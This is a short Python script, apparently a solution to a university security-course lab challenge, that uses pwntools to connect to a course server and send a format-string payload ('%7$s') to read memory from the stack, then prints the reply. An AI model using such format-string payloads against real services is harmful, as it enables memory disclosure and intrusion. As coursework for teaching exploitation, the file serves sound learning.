Files
ssof_labs/pa/lab7/chall_short_local_read.py
2026-01-08 19:16:57 +00:00

13 lines
212 B
Python

from pwn import remote
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25192
conn = remote(HOST, PORT)
pl = b"%7$s\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)